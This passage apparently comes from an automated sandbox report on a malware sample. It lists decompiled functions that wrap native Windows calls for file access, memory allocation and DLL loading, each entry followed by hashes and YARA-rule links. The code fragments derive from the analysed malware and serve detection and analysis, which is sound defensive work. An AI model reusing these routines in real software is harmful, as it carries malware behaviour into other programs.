                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA
                                        • API String ID: 2738559852-2163208940
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                        0x0040acec
                                        0x0040acef
                                        0x0040acf4
                                        0x0040acf9
                                        0x0040ad03
                                        0x0040ad08
                                        0x0040ad0b
                                        0x0040ad0d
                                        0x0040ad15
                                        0x0040ad1a
                                        0x0040ad1a
                                        0x0040ad21
                                        0x0040ad29
                                        0x0040ad2c
                                        0x0040ad2e
                                        0x0040ad42
                                        0x00000000
                                        0x0040ad44
                                        0x0040ad4a
                                        0x0040acfe
                                        0x0040acfe
                                        0x0040acfe

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00419D5A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t33;

				asm("adc [ecx], ah");
				asm("pushad");
				_t16 = _a4;
				_t3 = _t16 + 0xc40; // 0xc24
				E0041A960(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}





                                        0x00419d5c
                                        0x00419d5e
                                        0x00419d63
                                        0x00419d6f
                                        0x00419d77
                                        0x00419dad
                                        0x00419db1

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: f7f07aa86e10515c69ab15f66fc5188e9cb84a4bb2819d01fc2a798a0f0e557b
                                        • Instruction ID: 487103af4664cc5ea782aef0f87b847351b6816358d29a038228fdabc696a9c5
                                        • Opcode Fuzzy Hash: f7f07aa86e10515c69ab15f66fc5188e9cb84a4bb2819d01fc2a798a0f0e557b
                                        • Instruction Fuzzy Hash: 21F031B2214149AFCB05CF98DC84CEB77A9FF8C314B15864DF95D93202D634E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc24
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                        0x00419d6f
                                        0x00419d77
                                        0x00419dad
                                        0x00419db1

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                        0x00419f4f
                                        0x00419f57
                                        0x00419f79
                                        0x00419f7d

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                        0x00419e93
                                        0x00419e96
                                        0x00419e9f
                                        0x00419ea7
                                        0x00419eb5
                                        0x00419eb9

                                        APIs
                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ee1d9edb4050d36e20a9ddf1e2d255aee3b50d2944b3b22590908bb615257ff3
                                        • Instruction ID: b3a9b438f7dbe0df1384a919cb0ccde4bba7b8bc97f15b004e69351ecdfafb71
                                        • Opcode Fuzzy Hash: ee1d9edb4050d36e20a9ddf1e2d255aee3b50d2944b3b22590908bb615257ff3
                                        • Instruction Fuzzy Hash: 3090026660100502D30171594404B17004AD7D0381F91C07AA1014595ECA6589A2F171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0c99141745652553aa51b08220c986f6897abc2f2b77fac56bf89bcc028d94ad
                                        • Instruction ID: afbfe705632cae855b2ea283b7bc0c2fd14c96fbf443b17c116f3b3c9c9d602e
                                        • Opcode Fuzzy Hash: 0c99141745652553aa51b08220c986f6897abc2f2b77fac56bf89bcc028d94ad
                                        • Instruction Fuzzy Hash: 5C90027620100413D31161594504B070049D7D0381F91C47AA0414598D96968962F161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 906f1dc8a02c969c718e57537c274765b05d688af90033f028aad0f24da478ce
                                        • Instruction ID: 1ce1f23cb07642be14869ba03b5f69c5312b908433247d2debaad6d05b56eff8
                                        • Opcode Fuzzy Hash: 906f1dc8a02c969c718e57537c274765b05d688af90033f028aad0f24da478ce
                                        • Instruction Fuzzy Hash: AD900266242041525745B1594404A074046E7E0381791C07AA1404990C85669866E661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 42a0a86c9a1838fb64bff13cbba6be4ce324401a5181746bdff4b1983b37dc66
                                        • Instruction ID: 3c16a724926a03016c38c9ea789bde994e583aff62f0da8d073761539a8a81bd
                                        • Opcode Fuzzy Hash: 42a0a86c9a1838fb64bff13cbba6be4ce324401a5181746bdff4b1983b37dc66
                                        • Instruction Fuzzy Hash: B79002A634100442D30061594414F070045D7E1341F51C07DE1054594D8659CC62B166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 829b3fdb0f74b0e878361555b284b87c20216c4b482878407f7cfcc944353c41
                                        • Instruction ID: dcc9867185f830ec76a10b5ebf7af5a85c167381506aeaad011e1d19fee43b36
                                        • Opcode Fuzzy Hash: 829b3fdb0f74b0e878361555b284b87c20216c4b482878407f7cfcc944353c41
                                        • Instruction Fuzzy Hash: B09002B620100402D34071594404B470045D7D0341F51C079A5054594E86998DE5B6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 152b2993153229f9fe2e74a533d577a8ca467798207856d5885e159f5b9edd9b
                                        • Instruction ID: 0e4906780e64fca21e890a00484851c4d1d488e90805896463a5eb187a99f029
                                        • Opcode Fuzzy Hash: 152b2993153229f9fe2e74a533d577a8ca467798207856d5885e159f5b9edd9b
                                        • Instruction Fuzzy Hash: 6590026660100042434071698844E074045FBE1351751C179A0988590D85998875A6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 829adb1dcb85c3d5c5a3ea752516ebb7ca26451dc611a44d6da359d985d88c59
                                        • Instruction ID: 01714dbbc970b4de85c11121f10467464e358f2486616c7fbcaeb4c619fb15b4
                                        • Opcode Fuzzy Hash: 829adb1dcb85c3d5c5a3ea752516ebb7ca26451dc611a44d6da359d985d88c59
                                        • Instruction Fuzzy Hash: 2390027620140402D30061594814B0B0045D7D0342F51C079A1154595D86658861B5B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a8c5416b055ef68a37f9d62f60bdd7659d0113c6cbeaa2bd99a8b8be799b7ba6
                                        • Instruction ID: 7f6fd0c9ac98c599cb0147779c06938f0a0b809183f0ff6eca6e7a79ff67e11c
                                        • Opcode Fuzzy Hash: a8c5416b055ef68a37f9d62f60bdd7659d0113c6cbeaa2bd99a8b8be799b7ba6
                                        • Instruction Fuzzy Hash: 6490026621180042D30065694C14F070045D7D0343F51C17DA0144594CC9558871A561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 099ca5208d5596d7a796bb40c0c12d1bbf50bbc634466d4d19e13e9278162471
                                        • Instruction ID: 820ba26fcda885b21b30f9248597b6f13e2815c741c95877b504e3c92286ad95
                                        • Opcode Fuzzy Hash: 099ca5208d5596d7a796bb40c0c12d1bbf50bbc634466d4d19e13e9278162471
                                        • Instruction Fuzzy Hash: 749002A620200003430571594414B17404AD7E0341B51C079E10045D0DC56588A1B165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 948db111c30cc1e206415e8e0d64205323e33d2cd8ad6a1311bc17d8585a89df
                                        • Instruction ID: 98ac6fa92f6ad7b2da1003648a83820b0d719899efc07a10961cbf3b3c724ef4
                                        • Opcode Fuzzy Hash: 948db111c30cc1e206415e8e0d64205323e33d2cd8ad6a1311bc17d8585a89df
                                        • Instruction Fuzzy Hash: 3C90026A211000030305A5590704A070086D7D5391351C079F1005590CD6618871A161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 22bf2699ff1417e02c9b955cd84fdf405dc3bc9a96252dfb4a05a587b25d8a46
                                        • Instruction ID: ef3f1d21338aae1d0a101c2286d0c20732ce2425e0930c46edd68b7c14ac3775
                                        • Opcode Fuzzy Hash: 22bf2699ff1417e02c9b955cd84fdf405dc3bc9a96252dfb4a05a587b25d8a46
                                        • Instruction Fuzzy Hash: FF90027620108802D31061598404B4B0045D7D0341F55C479A4414698D86D588A1B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bd4e91a4b9847d5a0978da04bcb948c49ee2972cdd7ef5752c06c1446990a5dc
                                        • Instruction ID: 325ee70470f4df6fd41f4c485a4bc285edc6479432de1a9358f39abf841e8828
                                        • Opcode Fuzzy Hash: bd4e91a4b9847d5a0978da04bcb948c49ee2972cdd7ef5752c06c1446990a5dc
                                        • Instruction Fuzzy Hash: 1890027620100802D38071594404B4B0045D7D1341F91C07DA0015694DCA558A69B7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7082c8045f9bea87da28bcdbe98670f19b29784f4704124378a33273b9893a02
                                        • Instruction ID: 82f65bcc8152117e1afa4bad3c2e2826e821ab89e2ee0e9e12710210c716768e
                                        • Opcode Fuzzy Hash: 7082c8045f9bea87da28bcdbe98670f19b29784f4704124378a33273b9893a02
                                        • Instruction Fuzzy Hash: 4E90026630100003D34071595418B074045E7E1341F51D079E0404594CD9558866A262
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bee7edcfdb24307536adb992d2b0051dc6875d9236aaf3d8ed31bdac61e41337
                                        • Instruction ID: be30c140c696cdd7e7ea431e17e49f4edc2de0adfba1fe8339a275f66706a895
                                        • Opcode Fuzzy Hash: bee7edcfdb24307536adb992d2b0051dc6875d9236aaf3d8ed31bdac61e41337
                                        • Instruction Fuzzy Hash: 2090026E21300002D38071595408B0B0045D7D1342F91D47DA0005598CC9558879A361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 621ccd90a5ab7a2be581587d5b741a6cae5dd9bef7a1c874408dfe16d77b8a1a
                                        • Instruction ID: d89720763f8755e7e2197540fca22f5a2338286f5f132800046c9f4e74f0f745
                                        • Opcode Fuzzy Hash: 621ccd90a5ab7a2be581587d5b741a6cae5dd9bef7a1c874408dfe16d77b8a1a
                                        • Instruction Fuzzy Hash: B290027620100402D30065995408B470045D7E0341F51D079A5014595EC6A588A1B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                        0x004082f0
                                        0x004082ff
                                        0x00408303
                                        0x0040830e
                                        0x0040831e
                                        0x0040832e
                                        0x00408333
                                        0x0040833a
                                        0x0040833d
                                        0x0040834a
                                        0x0040834c
                                        0x0040834e
                                        0x0040836b
                                        0x0040836b
                                        0x00000000
                                        0x0040836d
                                        0x00408372

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                        • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                        • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                        • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACC3, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E0040ACC3(void* __eax, void* __ebx, void* __ecx, signed int __edi, intOrPtr _a4, void* _a8) {
				intOrPtr _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v16;
				char _v540;
				struct _OBJDIR_INFORMATION _t20;
				void* _t25;
				struct _OBJDIR_INFORMATION _t27;
				void* _t38;
				void* _t41;

				asm("pushfd");
				asm("stc");
				asm("insd");
				if((__edi ^  *(__edi - 0xc)) != 0) {
					L5:
					E0041CCF0( &_v8, 0);
					goto L6;
				} else {
					_push(_t38);
					_t38 = _t41;
					_v12 =  &_v540;
					_t25 = E0041C650( &_v16, 0x104, _a4);
					if(_t25 != 0) {
						_t27 = E0041CA70(__eflags, _v8);
						__eflags = _t27;
						if(_t27 != 0) {
							goto L5;
						}
						L6:
						_t20 = E0041AEA0(_v4);
						_v12 = _t20;
						__eflags = _t20;
						if(_t20 == 0) {
							LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
							_t20 = _v12;
						}
						return _t20;
					} else {
						return _t25;
					}
				}
			}













                                        0x0040acc3
                                        0x0040acc8
                                        0x0040acc9
                                        0x0040acca
                                        0x0040ad0f
                                        0x0040ad15
                                        0x00000000
                                        0x0040accc
                                        0x0040acd0
                                        0x0040acd1
                                        0x0040acec
                                        0x0040acef
                                        0x0040acf9
                                        0x0040ad03
                                        0x0040ad0b
                                        0x0040ad0d
                                        0x00000000
                                        0x00000000
                                        0x0040ad1d
                                        0x0040ad21
                                        0x0040ad29
                                        0x0040ad2c
                                        0x0040ad2e
                                        0x0040ad42
                                        0x0040ad44
                                        0x0040ad44
                                        0x0040ad4a
                                        0x0040acfb
                                        0x0040acfe
                                        0x0040acfe
                                        0x0040acf9

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction ID: 13bc7a4777827c273102ec3a69b4fa8c462a7b114b9ed6a62398f931e286b2be
                                        • Opcode Fuzzy Hash: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction Fuzzy Hash: 720171B5D4020DABDF10DFA4DC81FDDBB75AF54308F1082AAE908A7281F634AB54CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A241, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
